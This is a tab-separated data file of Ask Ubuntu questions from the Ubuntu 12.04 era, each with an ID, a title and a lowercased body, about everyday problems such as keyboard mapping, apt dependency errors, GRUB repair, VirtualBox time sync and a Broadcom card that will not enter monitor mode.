155436	backspace key not working	i have two keyborad keys , `` back '' and `` forward '' . forward works like it should , here is the output from xev for it : keypress event , serial 36 , synthetic no , window 0x4600001 , root 0x175 , subw 0x0 , time 16491048 , ( 21 , -17 ) , root : ( 771,35 ) , state 0x10 , keycode 167 ( keysym 0x1008ff27 , xf86forward ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x4600001 , root 0x175 , subw 0x0 , time 16491272 , ( 21 , -17 ) , root : ( 771,35 ) , state 0x10 , keycode 167 ( keysym 0x1008ff27 , xf86forward ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false back on the other hand gives this from xev focusout event , serial 36 , synthetic no , window 0x4600001 , mode notifygrab , detail notifyancestor focusin event , serial 36 , synthetic no , window 0x4600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 36 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 can someone help me make back work ? i do n't understand why x generats focus events for it..
155437	copying commands from ubuntu 10.04 terminal	can anyone tell me the way to copy commands from the ubuntu terminal ? i tried ctrl+c , shift+ins , right click option but none of these works .
155448	how to autostart gui application cross desktop ?	i want to add my gui application to autostart , while remaining cross desktop . .xinitrc looked suitable , but it 's not . kde does not listen to it . 1 if possible , i 'd like to prevent adding a custom autostart command for each desktop environment . how can i do so ?
155450	stop time sync between host and guest - virtualbox	so i 've been googling and i 've tried the following commands . i want to stop the virtual machine from having the correct time and just to stick with what time it last recorded . the host operating system is ubuntu 12.04 and the guest is windows xp . i 've turned time syncing off in xp so it wo n't do that when i connect to the internet . however it does appear to take the time from ubuntu and set it as it 's own . vboxmanage setextradata xp11 âvboxinternal/tm/warpdrivepercentageâ 200 vboxmanage setextradata xp11 `` vboxinternal/devices/vmmdev/0/config/gethosttimedisabled '' `` 1 '' both commands have n't work as the time is always set to the exact same as ubuntu 's . i 've located the extradata entry in the virtualbox xml file . it states both changes that the commands above are set to make . but of course it still has n't stopped updating the time . < extradata > < extradataitem name= '' gui/lastguestsizehint '' value= '' 1152,864 '' / > < extradataitem name= '' gui/lastnormalwindowposition '' value= '' 74,52,1152,911 '' / > < extradataitem name= '' vboxinternal/devices/vmmdev/0/config/gethosttimedisabled '' value= '' 1 '' / > < extradataitem name= '' & # x201c ; vboxinternal/tm/warpdrivepercentage & # x201d ; '' value= '' 200 '' / > < /extradata >
155452	ca n't install ubuntu , the 'install ' home screen is a white box	i have a curious issue . when i burn the iso and reboot , i 'm greeted with the ubuntu splash screen , then it loads into the welcome menu . i can not do anything at this point , ca n't interact with it , move the menu , etc . the menu itself is just a giant white box , so i do n't know the contents or a way to move past that screen . any ideas ? this is 12.04 , tried both 32 and 64 bit . typing this out , i 'm going to remove any usb devices and try again .
155453	unable to sync to ubuntu one after installing lxde and nautilus	i 've just installed ubuntu 12.04 and added lxde as well as nautilus . the downloading of my stored files has just started , but i 'm unable to sync new folders via right-clicking . how can i solve the problem ? i 'd like to avoid gnome .
155458	ubuntu 12.04 randomly freezes on ivy bridge - intel hd graphics 4000	i recently built a new pc running ubuntu 12.04 with an intel core i5 3450 cpu and am using the built in intel hd graphics . immediately after the installation , i noticed the desktop freezing completely at random times along with the following error message : the system is running in low graphics mode . your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . i tried troubleshooting this with some of the things i 've read here but nothing has worked so far . i 've already run a memory test from the grub menu and it reported no errors . thanks for any help .
155459	how do i set a system-wide proxy in lubuntu ( or lxde ) ?	in ubuntu with unity , we have an option to set a system wide proxy . when i tried lubuntu 12.04 , i found no such option . how do i set a system-wide proxy for lubuntu ? graphical method to set system-wide proxy , with screenshots requested .
155462	why ctrl + v wont work in terminal	usually i use ctrl+v for pasting the copied content .but it wont work in terminal .why it is disabled , is there any alternative key board shortcut to do it ?
155465	nvidia support on xubuntu	i have been using xubuntu on my portege m200 since version 11.10 with support for the internal nvidia geforce graphics card without any porblems . but after the last major update there is no more hardware support for the nvidia card . the gui tool for proprietary drivers states that there ist some driver , but it is not active . the question is : what is the correct package to get the card running ? and why did you remove the support for this card from version to version ! ?
155466	ca n't uninstall vmware player 4.0.3	i have vmware palyer 4.0.3 installed on ubuntu 12.04 with kernel 3.3.6 . for some reasons the network does n't work on it ( maybe because of the kernel ) i tried to uninstall the vmware player using wmware-installer -u vmware-player but it failed . this is what i get in the dialog : the vmware installer could not shut down all running virtual machines . if you have ace vms open , please shut them down or suspend them now and press 'retry ' to continue . i do n't have any vm running and i tried to use serive command to stop but it failed again with this error : bamdad @ laptop : ~/software/patch $ sudo service vmware stop stopping vmware services : vmware authentication daemon done /etc/init.d/vmware : line 351 : [ : 16519574018620477093 : integer expression expected vm communication interface socket family failed virtual machine communication interface failed virtual machine monitor failed blocking file system done error : module vmnet is in use by [ permanent ] i searched for custom patches and found nothing . i have no idea what else i can do to uninstall this vmware and install another one . please help bamdad
155468	does my linode vps come with a mail server and what is its fqdn ?	i have a linode account when i click on dns manager then edit my domain name there is a section that says mail server and written as mail.mydomain.com . does that mean linode comes with a email server and i dont have to install one ? also if i do need to install one when installing postfix it asks for a fully qualified domain name , im always unsure what to put for this one . would it be mail.mydomain.com or the default one that comes with linode which is in this format : lixxx-xx.members.linode.com or the domain i want to use like mydomain.com
155471	t901 fujitsu touch screen disable hand touch	i have a t901 fujitsu with a touch screen and i want to disable the hand input , but leave the input from the pen so i can easily write on my screen without my hand interfering . does anyone know of a simple ( ish ) way of doing this ?
155475	skype not present after installing	i 've downloaded skype for ubuntu , but after several attempts at installing it , and ubuntu even telling me it has been installed , it is nowhere to be found . this either means that ubuntu has hidden it , or that ubuntu has in fact not installed it . i do n't know which it is , but would simply like to use skype . what can i do to convince ubuntu to install skype properly ?
155477	how do i remotely control another ubuntu desktop from ubuntu ?	how do i remotely control another desktop ( both are ubuntu 12.04 ) from my client machine ? is it possible to use remmina remote desktop client ?
155484	how to execute an arbitrary command when open a new gnome profile terminal ?	i want to create a profile terminal that executes this command rvm use 1.9.2 and leave me in the prompt after choosing my ruby version . user @ user-desktop : ~/sites/railsapp $ rvm use 1.9.2 using /home/user/.rvm/gems/ruby-1.9.2-p290 i 've tried to put in `` run a custom command instead of my shell custom command '' like i saw here but this does n't work : bash -l -c `` rvm use 1.9.2 '' thanks in advance .
155488	why i am getting `` 404 not found '' errors for a ppa when updating ?	i get these errors with update manager ( or apt-get ) , but am still able to download and install updates . how do i fix it ? w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu /dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu /dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
155491	advantages/disadvantages of installing from source code	i 've just installed conky from a source code , the advantage that i see is that i have the newest version ( 1.9 instead of 1.8 from repo ) . the disadvantage - to uninstall i have to remove sth from /usr/ i think , but i 'm not sure . are there any other disadvantages/advantages ?
155492	why can not ubuntu 12.04 detect windows 7 ( dual boot )	i was trying to install ubuntu 12.04 alongside with windows 7 . i only have one hard drive ( 1tb ) , and i first installed window 7 on one partition . now there are about 500gb unlocated space on the disk , and i 'd like to install ubuntu on that part of that partition . what i did was to boot from a usb stick to install ubuntu . i have the same problem with the following post . ubuntu 12.04 does not see windows already install on my computer ( dual installation ) in the installation , ubuntu can not detect the windows 7 , so there is no option `` install ubuntu alongside with windows 7 '' . i follow the suggestion provided in the above post , and installed the `` boot-repair '' tool . then i use the boot-repair tool to create a bootinfo summary . thu url of the bootinfo : http : //paste.ubuntu.com/1057933/ i also use `` try ubuntu '' to use the terminal . when i type `` sudo os-prober '' in the command line , it returns nothing . it seems that ubuntu can not detect the installed windows 7 . since my situation is different from that in the previous post . i only have one hard drive , so the problem should not be related to any raid thing . can anybody help me on this ? what can i to make ubuntu to detect the windows 7 .
155494	ubuntu took away permissions from my data partition	the pangolin has struck again . the bug of the day for today is ubuntu taking away my permissions on my data partition ( ntfs ) . one moment everything worked fine , the next moment i could n't chmod anything anymore . chown throws no errors or warnings at all , but nothing has changed either . chmod keeps saying operation not permitted . i 've been messing around with /etc/fstab as suggested by other answers on askubuntu , but none of them seem to have the desired effect . this is my current line : uuid=25d7d681409a96b7 /media/data ntfs defaults , umask=000 , gid=46 , permissions , users , auto , exec 0 0 for reference , this is the original one : uuid=25d7d681409a96b7 /media/data ntfs defaults , umask=007 , gid=46 0 0 ( right after the problem started occuring ) what do i need to do so i am the owner of my own hard drive again ? i want to be able to just use chmod and chown ( without sudo ) without being told that some mysterious alien has taken over control of my data partition . i can still read and write , but execution permissions seem to be the problem . -- i already figured out the execution permissions problem . the bounty 's for the one who can tell me how i can set myself as owner of the data on that partition .
155496	how do i force only one instance of my application ?	i am developing a program using quickly . i am using an indicator which can hide/show the main window . but when i launch the application from the launcher it starts a new instance of that application ( so an additional indicator will be shown ) . rather than just showing the main window of the previous running app . what 's the usual way of forcing only one indicator ?
155497	where are my hard drives/local disks on the computer/system folder in ubuntu 12.04 ?	being first to try ubuntu . but where are my hard drives/local disks on the computer/system folder in ubuntu 12.04 ? ! before installing 12.04 i had tried the ubuntu 10.10 version live and it was perfect in showing my local disks . but it could n't recognize my gtx 470 graphics driver so i thought of trying the recent version i.e 12.04 . fortunately it solved the graphics driver thing but now i am stuck with finding my local disks on 12.04 . i am sorry if this is a silly question , but i know nothing of ubuntu at the moment . regards ,
155499	regain control of mouse by restarting xorg ?	lately whilst browsing the web the mouse will `` hold down left click '' and not let go -- i.e . i get a closed hand icon that can move around but does n't interact with the screen . restarting the os solves it but i do n't want to to continually lose what i 'm working on . this is a problem with trackpad or usb mouse equally . from googling it looks like since ubuntu 8 or earlier there has been a problem with xorg whereby mouse errors in firefox cause this problem . the error was also noticed by this user : usb mouse moves but does n't accept left clicks ? i was able to solve the problem once by closing openbox and restarting with awesome but today that 's not working . any other ideas ? could i restart xorg without losing everything and thereby `` restart the mouse '' ?
155506	no space left on hard drive	i 'm trying to copy/move files to an external 1 tb hard drive with about 50 gb remaining space . i receive a `` no space left on disk '' when i try . i 've moved files off and retried , but still get the same message . disk usage analyzer , properties , and freeware treesize all report available hard drive space of about 50 gb . i 've tried df -i ( 50 gb available ) and df -k , with the latter reporting only 1 % of inode usage . i 've been able to save files from firefox to the drive also . i ca n't even rename files without getting the message . yesterday in the midst of trying to figure this out i tried to move 4 files to the drive and got the message . today , i found them on the drive . what 's up with that ? ( that 's the only time that has happened to my knowledge . ) is this an ubuntu problem ? or is my hard drive just about to fail because of something like a controller problem ?
155513	creating ubuntu browser app frames	after watching the video i am inspired to create one browser but stuck at one place , could you please help me with this . requirement = - like you displayed in your video i wan create multiple buttons in my toolbar which will open second toolbar or popup window . - from that pop window i wanted to select specific button which will open my required browser . question - - as displayed in your video i create new button and if i try to open new link using that it works but now i want to display tool bar or popup window once any one click on that button , how can i do that.the second tool bar need to be activated only after clicking on that button . things i tried - - as per my understanding i create second toolbar and on that tool bar i have created button , now i wan know how do i link that tool bar with my browser toolbar button . - i tried that by passing signal property in second toolbar in quickly but something is missing . my code class tvbrowserwindow ( window ) : __gtype_name__ = `` tvbrowserwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( tvbrowserwindow , self ) .finish_initializing ( builder ) self.aboutdialog = abouttvbrowserdialog self.preferencesdialog = preferencestvbrowserdialog # code for other initialization actions should be added here . self.refreshbutton=self.builder.get_object ( `` refreshbutton '' ) self.sony=self.builder.get_object ( `` sony '' ) self.urlentry=self.builder.get_object ( `` urlentry '' ) self.scrolledwindow1=self.builder.get_object ( `` scrolledwindow1 '' ) self.webview = webkit.webview ( ) self.scrolledwindow1.add ( self.webview ) self.webview.show ( ) def on_refreshbutton_clicked ( self , widget ) : print `` refresh '' def on_urlentry_activate ( self , widget ) : url = widget.get_text ( ) print url self.webview.open ( url )
155514	unmet dependencies in ubuntu 12.04	i tried today to install a dvb-card on my ubuntu 12.04 ( linux blauhai-linux 3.2.0-25-generic # 40-ubuntu smp wed may 23 20:30:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux ) . the installation failed with an error . after that , i tried to install python ( it was already installed but i got this error ) : linux : ~ $ sudo apt-get install git reading package lists ... done building dependency tree reading state information ... done git is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : python-glade2 : i386 : depends : python : i386 ( < 2.5 ) but it is not going to be installed depends : python-support : i386 ( > = 0.3.4 ) but it is not installable depends : python : i386 ( > = 2.4 ) but it is not going to be installed depends : libglade2-0 : i386 ( > = 1:2.5.1 ) but it is not going to be installed depends : python-gtk2 : i386 ( = 2.8.6-8 ) but it is not going to be installed python-numeric : i386 : depends : python : i386 ( < 2.5 ) but it is not going to be installed depends : python : i386 ( > = 2.3 ) but it is not going to be installed depends : python-central : i386 ( > = 0.5.7 ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . well , i can read and tried the proposed command , but then i get this : linux : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libopenal1 : i386 libsdl-ttf2.0-0 : i386 libkrb5-3 : i386 libgconf-2-4 : i386 libsm-dev libatk1.0-0 : i386 libk5crypto3 : i386 libstdc++5 : i386 libqt4-declarative : i386 libxcomposite1 : i386 libice-dev libgail18 : i386 libldap-2.4-2 : i386 libao-common libv4l-0 : i386 liblcms1 : i386 libqt4-qt3support : i386 libroken18-heimdal : i386 libunistring0 : i386 libcupsimage2 : i386 libgphoto2-port0 : i386 libidn11 : i386 libnss3 : i386 libcaca0 : i386 gtk2-engines : i386 libgudev-1.0-0 : i386 libjpeg-turbo8 : i386 libpthread-stubs0 libcairo-gobject2 : i386 libavc1394-0 : i386 libjpeg8 : i386 libotr2 libaio1 : i386 libsane : i386 odbcinst1debian2 odbcinst1debian2 : i386 libqt4-test : i386 libqt4-script : i386 libqt4-designer : i386 libsdl-mixer1.2 : i386 libqt4-network : i386 libqt4-dbus : i386 libcap2 : i386 libproxy1 : i386 ibus-gtk : i386 libdbus-glib-1-2 : i386 libtdb1 : i386 libasn1-8-heimdal : i386 libspeex1 : i386 libxslt1.1 : i386 libgomp1 : i386 libcapi20-3 : i386 libibus-1.0-0 : i386 libcairo2 : i386 libgnutls26 : i386 libopenal-data odbcinst libgssapi3-heimdal : i386 libcanberra0 : i386 libtasn1-3 : i386 libfreetype6 : i386 x11proto-kb-dev gtk2-engines-murrine : i386 libwavpack1 : i386 libqt4-opengl : i386 libsoup-gnome2.4-1 : i386 libv4lconvert0 : i386 gstreamer0.10-plugins-good : i386 libc6-i386 lib32gcc1 libqt4-xmlpatterns : i386 librsvg2-common : i386 libdatrie1 : i386 xtrans-dev libavahi-common-data : i386 libiec61883-0 : i386 lib32asound2 libgdk-pixbuf2.0-0 : i386 libsdl-image1.2 : i386 libp11-kit0 : i386 x11proto-input-dev libwind0-heimdal : i386 libpixman-1-0 : i386 libsdl1.2debian : i386 libxaw7 : i386 libgdbm3 : i386 libcups2 : i386 libcurl3 : i386 libqtcore4 : i386 libxinerama1 : i386 libesd0 : i386 libmikmod2 : i386 libkrb5support0 : i386 libxft2 : i386 libxt-dev libcroco3 : i386 libpulse-mainloop-glib0 : i386 libice6 : i386 libaa1 : i386 libieee1284-3 : i386 libgcrypt11 : i386 libthai0 : i386 libao4 : i386 libkeyutils1 : i386 libxmu6 : i386 libcanberra-gtk0 : i386 libvorbisfile3 : i386 libqt4-sql : i386 esound-common libxpm4 : i386 libqt4-svg : i386 libusb-0.1-4 : i386 libgail-common : i386 libxrender1 : i386 libhcrypto4-heimdal : i386 libraw1394-11 : i386 libnspr4 : i386 libshout3 : i386 libdv4 : i386 libhx509-5-heimdal : i386 libxau-dev libqt4-xml : i386 gstreamer0.10-x : i386 libgettextpo0 : i386 libxss1 : i386 libgd2-xpm : i386 libheimbase1-heimdal : i386 libtiff4 : i386 libsdl-net1.2 : i386 libjasper1 : i386 libgnome-keyring0 : i386 libxtst6 : i386 gtk2-engines-pixbuf : i386 libqtgui4 : i386 libtag1c2a : i386 librsvg2-2 : i386 libavahi-client3 : i386 libssl0.9.8 : i386 libmpg123-0 : i386 libmad0 : i386 libsasl2-2 : i386 xorg-sgml-doctools libgsoap1 gtk2-engines-oxygen : i386 libfontconfig1 : i386 xaw3dg : i386 libpango1.0-0 : i386 libsm6 : i386 libx11-dev libheimntlm0-heimdal : i386 libpulsedsp : i386 lib32stdc++6 libx11-doc libqt4-sql-mysql : i386 libxcb-render0 : i386 libodbc1 : i386 libexif12 : i386 libqt4-scripttools : i386 librtmp0 : i386 libgssapi-krb5-2 : i386 libxi6 : i386 libqtwebkit4 : i386 libxcb1-dev libxp6 : i386 libaudio2 : i386 libxcursor1 : i386 libxcb-shm0 : i386 libxt6 : i386 libxv1 : i386 libsasl2-modules : i386 libavahi-common3 : i386 libxrandr2 : i386 x11proto-core-dev libsqlite3-0 : i386 libmng1 : i386 libgtk2.0-0 : i386 libxdmcp-dev libpthread-stubs0-dev libltdl7 : i386 libkrb5-26-heimdal : i386 libssl1.0.0 : i386 glib-networking : i386 libgpg-error0 : i386 libsoup2.4-1 : i386 libgphoto2-2 : i386 libtag1-vanilla : i386 libaudiofile1 : i386 libglade2-0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : default-jre default-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common libglade2-0 : i386 libpython3.2 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib python3 python3-minimal python3-uno python3.2 python3.2-minimal suggested packages : icedtea-plugin sun-java6-fonts fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts python3-doc python3-tk python3.2-doc binfmt-support the following packages will be removed : activity-log-manager-control-center aisleriot alacarte apparmor apport apport-gtk apt-xapian-index aptdaemon apturl apturl-common bluez bluez-alsa bluez-alsa : i386 bluez-gstreamer checkbox checkbox-qt command-not-found compiz compiz-gnome compiz-plugins-main-default compizconfig-backend-gconf deja-dup duplicity eog evolution-data-server firefox firefox-globalmenu firefox-gnome-support foomatic-db-compressed-ppds gconf-editor gconf2 gdb gedit gir1.2-mutter-3.0 gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-ubuntuoneui-3.0 gksu gnome-applets gnome-applets-data gnome-bluetooth gnome-contacts gnome-control-center gnome-media gnome-menus gnome-orca gnome-panel gnome-panel-data gnome-session-fallback gnome-shell gnome-sudoku gnome-terminal gnome-terminal-data gnome-themes-standard gnome-tweak-tool gnome-user-share gstreamer0.10-gconf gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hplip hplip-data ia32-libs ia32-libs-multiarch : i386 ibus ibus-pinyin ibus-table indicator-datetime indicator-power jockey-common jockey-gtk landscape-client-ui-install language-selector-common language-selector-gnome launchpad-integration libcanberra-gtk-module libcanberra-gtk-module : i386 libcanberra-gtk3-module libcompizconfig0 libfolks-eds25 libgksu2-0 libgnome-media-profiles-3.0-0 libgnome2-0 libgnome2-common libgnomevfs2-0 libgnomevfs2-common libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libmetacity-private0 libmutter0 libpeas-1.0-0 libpurple-bin libpython2.7 libreoffice-gnome librhythmbox-core5 libsyncdaemon-1.0-1 libtotem0 libubuntuoneui-3.0-1 light-themes lsb-release metacity metacity-common mutter-common nautilus-dropbox nautilus-share network-manager-gnome nvidia-common nvidia-settings nvidia-settings-updates onboard oneconf openjdk-7-jdk openjdk-7-jre openprinting-ppds pidgin pidgin-libnotify pidgin-otr printer-driver-foo2zjs printer-driver-ptouch printer-driver-pxljr printer-driver-sag-gdi printer-driver-splix python python-appindicator python-apport python-apt python-apt-common python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-brlapi python-cairo python-central python-chardet python-configglue python-crypto python-cups python-cupshelpers python-dateutil python-dbus python-debian python-debtagshw python-defer python-dirspec python-egenix-mxdatetime python-egenix-mxtools python-gconf python-gdbm python-gi python-gi-cairo python-glade2 : i386 python-gmenu python-gnomekeyring python-gnupginterface python-gobject python-gobject-2 python-gpgme python-gst0.10 python-gtk2 python-httplib2 python-ibus python-imaging python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libproxy python-libxml2 python-louis python-mako python-markupsafe python-minimal python-notify python-numeric : i386 python-oauth python-openssl python-packagekit python-pam python-pexpect python-piston-mini-client python-pkg-resources python-problem-report python-protobuf python-pyatspi2 python-pycurl python-pyinotify python-renderpm python-reportlab python-reportlab-accel python-serial python-simplejson python-smbc python-software-properties python-speechd python-twisted-bin python-twisted-core python-twisted-names python-twisted-web python-ubuntu-sso-client python-ubuntuone-client python-ubuntuone-control-panel python-ubuntuone-storageprotocol python-uno python-virtkey python-wadllib python-xapian python-xdg python-xkit python-zeitgeist python-zope.interface python2.7 python2.7-minimal rhythmbox rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone screen-resolution-extra sessioninstaller skype software-center software-center-aptdaemon-plugins software-properties-common software-properties-gtk system-config-printer-common system-config-printer-gnome system-config-printer-udev texlive-extra-utils totem totem-mozilla totem-plugins ubuntu-artwork ubuntu-desktop ubuntu-minimal ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-standard ubuntu-system-service ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-couch ubuntuone-installer ufw unattended-upgrades unity unity-2d unity-common unity-lens-applications unity-lens-video unity-scope-musicstores unity-scope-video-remote update-manager update-manager-core update-notifier update-notifier-common usb-creator-common usb-creator-gtk virtualbox virtualbox-dkms virtualbox-qt xdiagnose xul-ext-ubufox zeitgeist zeitgeist-core zeitgeist-datahub the following new packages will be installed : default-jre default-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common libglade2-0 : i386 libpython3.2 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib python3 python3-minimal python3-uno python3.2 python3.2-minimal warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! python-minimal python2.7-minimal ( due to python-minimal ) 0 upgraded , 16 newly installed , 273 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 39.1 mb of archives . after this operation , 324 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] thats not good , is it ? ! should i run this command or should i run another command to fix this problem ? would be great if somebody can help me . : ) thanks in advance . best regards
155519	how to hide a gtk window in python before call or os.system	so , i 'm depeloping a python/gtk app which , after showing an assistant , it hides the assistant 's window and runs an external app . the problem is that window.hide ( ) does n't works if , after the command , there 's an app call using os.system ( ) or call ( ) . when the call is done , the window seems to hang and it does n't disappears until all the calls are done . so ... what can be done ?
155524	stuck on ubuntu boot screen	i recently download ubuntu 12.04 lts onto my macbook pro 5-5 . everything worked seamlessly , save for the brightness control . i could n't change the screen brightness from the hardware buttons , nor from the system preferences . to fix it , i used the instructions here : macbookpro 5-5 lcd brightness control at # 2 , i restarted my laptop , only to see that it went straight to the ubuntu startup screen , with the 5 orange dots ( usually they all startoff white , then turn orange to indicate progress ) . from there , i tried controlling the brightness from the keyboard , and it worked , but sadly , my computer is still stuck on the loading screen . ( yes , i have tried manually restarting it ) could you please help ? thank you in advance
155526	off-topic : how can i update `` quickly '' using a ppa or similar in the source file ?	i am running an ubuntu derivative that runs a bit behind in the updates . the version i 'm running ~ $ quickly -- version quickly 11.10 python interpreter : /usr/bin/python 2.7.2 python standard library : /usr/lib/python2.7 quickly used library : /usr/lib/python2.7/dist-packages/quickly quickly data path : /usr/share/quickly quickly detected template directories : /usr/share/quickly/templates/ copyright 2009 rick spencer copyright 2009-2011 didier roche copyright 2010-2011 canonical ltd https : //launchpad.net/quickly quickly comes with absolutely no warranty . quickly is free software , and you may use , modify and redistribute it under the terms of the gnu general public license version 3 or later . i have tried finding a ppa for quickly to add to my source file list and i have found https : //launchpad.net/ubuntu/+source/quickly and https : //code.launchpad.net/~ubuntu-branches/ubuntu/precise/quickly/precise-updates i even found what i thought was the developers ppa http : //ppa.launchpad.net/quickly/daily-build/ubuntu for the latter i get the 404 error both when is says the distribution is set to oneric or precise . would i need to compile the source or is there some way to add the ppa without using ubuntu ?
155528	why ca n't i set monitor mode with the wl sta driver on a broadcom wireless card ?	i am trying to set my wireless card into monitor mode . i am working with : description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation logical name : eth2 when i try to set it to monitor mode i get : sudo iwconfig eth2 mode monitor error for wireless request `` set mode '' ( 8b06 ) : set failed on device eth2 ; invalid argument . i also tried using : $ sudo airmon-ng start eth2 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 1094 networkmanager 1096 avahi-daemon 1097 avahi-daemon 1167 wpa_supplicant 1720 dhclient process with pid 1720 ( dhclient ) is running on interface eth2 interface chipset driver eth2 unknown wl ( monitor mode enabled ) $ sudo iwconfig lo no wireless extensions . eth0 no wireless extensions . eth2 ieee 802.11bg essid : '' redacted '' mode : managed frequency:2.437 ghz bit rate=54 mb/s tx-power:24 dbm retry min limit:7 rts thr : off fragment thr : off power management : off link quality=4/5 signal level=-59 dbm noise level=-57 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:24 invalid misc:0 missed beacon:0 i 've gone through various driver tutorials , but nothing is helping . anyone know how to get this working for this specific wireless card ?
155530	can i use unity with the dash and hud only ? 12.04	i love the dash , find the hud to be cool , hates the launcher and loathes the panel ! so is there a way that i can run the dash alone and use gnome or cinnamon or whatever as a window manager ?
155531	build failed with the command : quickly submitubuntu	we try to submit our application for the ubuntushowdown contest , but when we do the command : quickly submitubuntu , the application is not submitted , we have errors such as `` build failed '' . we spend time about reading the log , but we are stuck , we do n't know much about launchpad , can you explain us this error ? you could find the log here thanks for your help .
155532	i need to create a .sh installer file	i need to create a .sh installer file . i have the files , i just need to know the commands that will lead the terminal into placing the files in certain locations . there is a folder that needs to be placed in the /var directory , and a file in the /etc/init.d directory . does anyone know what commands in the file are appropriate ? there is a folder that needs to be placed in the /var directory , and a file in the /etc/init.d directory .
155535	is there a way to make almost all video files work on ubuntu using a media player , or a codec installation pack ?	i used to use media player classic in windows and it played everything ! i 've installed vlc on my ubuntu 12.04 system and while it plays 99 % of the files i try to play on it , there are these video files from a coursera torrent that i 'm trying to play but the audio is cracking a lot ! the same file , when played on vlc or media player classic on windows , plays with very minimal cracks in audio and is considerably better and also audible . i was wondering if there 's some all-in-one codec pack like k-lite pack ( or media player classic ) for windows that will take care of my problem ?
155538	what is apt and aptitude in ubuntu ?	i 've been blindly copy pasting code that contains these keywords to install programs and having migrated from windows , i do n't quite understand what they mean . can anyone explain them and their significance with their similarities/differences ? also , i would like to know how do you know the answer to this question ? i mean , since i am learning to use ubuntu now from barely any prior experience , how should i have know this answer ? where should i have looked for it , apart from googling , which i tried only to find answers not satisfying/clear enough .
155543	i messed up grub ubuntu 12.04	i was playing around with super boot manager and it 's pretty gui features , and ended up messing up everything . i had it working really well before i started messing with super boot manager . previous grub/burg setup had ubuntu , fedora , and windows 7 in it . but now it only shows windows . the last thing i did was apply a fix to the grub2 via super boot manager ( should n't have done that ) . i am able to get to the grub terminal from burg , but i do n't know any commands from there . if i could at least boot into ubuntu i 'm pretty sure i can fix the rest . can anybody help with this ? also , i ca n't remember the exact partition i need to get into ex : ( hd0 , sdb1 ) something like that . so some commands to get that info would help as well ! thanks !
155545	how do i get qsystemtrayicon to show up in gnome 3 ?	i can get a qsystemtrayicon to show up in unity by installing the sni-qt package which acts as a broker between the application and an application indicator for the program . however , running the application under gnome 3 does n't work - no icon appears anywhere . is there a similar package that does the same thing as the sni-qt package but for gnome 3 ?
155546	`` no such file or directory '' error when trying to install pcre	am using ubuntu 12.04 and am trying to install pcre however i encountered an error message when i tried to use the command : sudo make after the ./configure command . i have this error message /bin/sed : ca n't read files/pcre/pcre-8.30/libpcre.la : no such file or directory libtool : link : `files/pcre/pcre-8.30/libpcre.la ' is not a valid libtool archive make [ 1 ] : *** [ libpcreposix.la ] error 1 make [ 1 ] : leaving directory `/home/dimaz/downloads/snort files/pcre/pcre-8.30' make : *** [ all ] error 2 how can i fix this ?
155552	where does gnome color manager store the icm or icc files ?	i am trying to create a professional photography workflow in ubuntu . i 've calibrated my monitor with a spyder 3 ( works out of the box in 12.04 ) . but i need to know the file path to the monitor calibration profile that is created in the gnome color manager ( `` color '' in system settings ) . where is the *.icm file located ? it 's not in the usr/share/color directory . any help would be really appreciated . thanks
155553	hp hs2340 hspa+ mobilebroadband on hp mini 210-4160ew mobile internet illness	the hardware is recognized with success . in iwconfig command it is : usb0 the os is : ubuntu 12.04 the most up to date from ubuntu site in network manager is an info : mobile connection : not powered on at starting of loading desktop , i 'm asked to insert a pin to unlock modem , i write pin and nothing hapens set up manual connection does n't help internet vendor : orange ( poland ) the card is unlocked ( for sure ) wifi and ethernet cable internet works perfectly i 'm a newbie in linux i 'm asking for the resolve of problem - step by step i 'm really sorry for my english i do n't really now what to do to have an internet on my netbook via modem all the best here from poland
155558	path to gettext locales directory	i want add locales support to my python app , but i have problem with path to directory with translates . defualt is /usr/share/locale , but what is recommended method to define it ? writing path in source code using special function to discover it
